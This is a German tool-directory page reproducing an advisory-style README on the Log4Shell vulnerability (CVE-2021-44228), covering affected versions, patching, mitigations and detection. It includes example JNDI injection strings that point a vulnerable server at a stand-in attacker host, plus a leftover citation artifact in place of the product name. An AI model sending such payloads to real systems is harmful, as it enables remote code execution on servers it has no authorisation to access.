Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-44228 — CVE-2021-44228 | Kitploit
Tools/GitHubGitHub/0xblackash/cve-2021-44228
Vulnerability AnalysisExploitationWeb Application ExploitationThreat IntelligenceLearning & EducationCurated Resources
GitHub0xblackash/cve-2021-44228

CVE-2021-44228

CVE-2021-44228

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2021-44228 — „Log4Shell“

ChatGPT Image Jun 14, 2026, 02_56_45 PM

Severity CVSS Type Date

Eine kritische Remote-Code-Ausführungs-Sicherheitslücke in Apache Log4j 2, weithin bekannt als Log4Shell.


📖 Inhaltsverzeichnis

  • Übersicht
  • Technische Details
  • Schweregrad & CVSS
  • Betroffene Versionen
  • Ausnutzung & Auswirkungen
  • Auswirkungen in der Praxis
  • Erkennung
  • Abhilfe & Korrekturen
  • Zusammenfassung

🔎 Übersicht

CVE-2021-44228 ist eine kritische RCE-Schwachstelle in :contentReference[oaicite:0]{index=0} Version 2.x (vor 2.15.0), entdeckt im Dezember 2021.

Sie ermöglicht es nicht authentifizierten entfernten Angreifern, beliebigen Code auf verwundbaren Systemen auszuführen, indem sie einfach speziell gestaltete Eingaben senden, die von Log4j protokolliert werden. Der Fehler betrifft unzählige Java-basierte Anwendungen und Dienste weltweit.


🧠 Technische Details

Die Sicherheitslücke entsteht durch Log4js Handhabung von JNDI-Lookups in protokollierten Zeichenfolgen. Ein Angreifer kann eine bösartige JNDI-Ressource in eine protokollierte Nachricht einbetten (z. B. LDAP, DNS), wie:

root@kitploit:~

${jndi:ldap://attacker.com/a}

Log4j wird:

  1. Den JNDI-Lookup aus der Eingabe parsen
  2. Einen entfernten Lookup auf dem vom Angreifer kontrollierten Server durchführen
  3. Böswilligen Java-Code als Teil des Lookup-Prozesses laden
  4. Diesen Code im Kontext der verwundbaren Anwendung ausführen

Dies ermöglicht es einem Angreifer, eine vollständige Remote Code Execution (RCE) auf betroffenen Diensten zu erreichen.


📊 Schweregrad & CVSS

Da Log4j in unzähligen Bibliotheken und Anwendungen verwendet wird, könnte jedes System, das nicht vertrauenswürdige Daten protokolliert, verwundbar sein.


📦 Betroffene Versionen

Die folgenden Versionen von Log4j 2 sind verwundbar:

root@kitploit:~

> = 2.0-beta9 and < 2.15.0

Zusätzlich waren einige Konfigurationen von 2.15.0 immer noch ausnutzbar, daher sind 2.16.0 und höher die sichere Basis.


🛠 Abhilfe & Korrekturen

✅ Offizielle behobene Versionen

Aktualisieren Sie auf Log4j 2-Versionen:

root@kitploit:~

2.17.1 or later

Spätere Patches verbessern die Sicherheit weiter (z. B. 2.17.2, 2.19.0, usw.).


🧱 Temporäre Gegenmaßnahmen (falls Sie nicht sofort patchen können)

Wenn ein sofortiges Upgrade nicht möglich ist, können Sie:

  • JNDI-Lookups deaktivieren in der Log4j-Konfiguration
  • Setzen Sie:
root@kitploit:~

log4j2.formatMsgNoLookups=true

  • Entfernen Sie die JndiLookup-Klasse aus dem Classpath:
root@kitploit:~

zip -q -d log4j-core.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Diese Schritte helfen, die Gefährdung zu reduzieren, bis Sie aktualisieren können.


🔥 Ausnutzung & Auswirkungen

nessus3 nessus4 nessus5

Diese Sicherheitslücke ist extrem einfach auszunutzen. Ein Angreifer muss nur eine manipulierte Zeichenfolge senden (z. B. über HTTP-Header, Formularparameter, Chat-Nachrichten, Datenbankfelder), die von der Anwendung protokolliert wird:

root@kitploit:~

User-Agent: ${jndi:ldap://attacker.example/a}

Sobald sie protokolliert wurde, führt die Anwendung einen entfernten Lookup durch und kann gezwungen werden, vom Angreifer kontrollierten Java-Code auszuführen.


🌍 Auswirkungen in der Praxis

Log4Shell hatte massive globale Auswirkungen:

  • Unzählige öffentlich zugängliche Dienste waren sofort exponiert
  • Cloud-Anbieter, Spieleserver, Unternehmensanwendungen, IoT, Webdienste, APIs und mehr waren betroffen
  • Ganze Sicherheitsgemeinschaften mobilisierten sich, um verwundbare Systeme zu erkennen und zu patchen
  • Die Ausnutzung war weit verbreitet, automatisiert und schnell

Dies ist eine der bedeutendsten Sicherheitslücken seit Jahrzehnten.


🧪 Erkennung

Sie können verwundbare Systeme erkennen, indem Sie:

  • Logs auf verdächtige JNDI-Muster durchsuchen (${jndi:)
  • Verwenden von Schwachstellenscannern, die nach Log4j-Versionen suchen
  • Überwachen des eingehenden Datenverkehrs auf Ausnutzungsversuche
  • Überprüfen des Classpath-Inhalts auf JNDI-Lookup-Unterstützung

📌 Zusammenfassung


⚠️ Abschließende Empfehlung

Wenn Ihre Anwendung oder eine von Ihnen verwendete Bibliothek auf Log4j 2.x angewiesen ist, aktualisieren Sie sofort auf eine gepatchte Version (≥ 2.17.1) und stellen Sie sicher, dass JNDI-Lookups deaktiviert oder entfernt sind, wo möglich.

Tool herunterladen
MetrikDetail
CVSS v3.1 Basis-Score10.0 (Kritisch)
AngriffsvektorNetzwerk
Erforderliche PrivilegienKeine
BenutzerinteraktionKeine
AuthentifizierungNicht erforderlich
AuswirkungVollständige RCE
FeldWert
CVE-IDCVE-2021-44228
SpitznameLog4Shell
ProduktApache Log4j 2
SchweregradKritisch (CVSS 10.0)
TypRemote Code Execution
AuswirkungVollständige Systemkompromittierung
AusnutzbarkeitExtrem einfach
GegenmaßnahmePatchen auf ≥ 2.17.1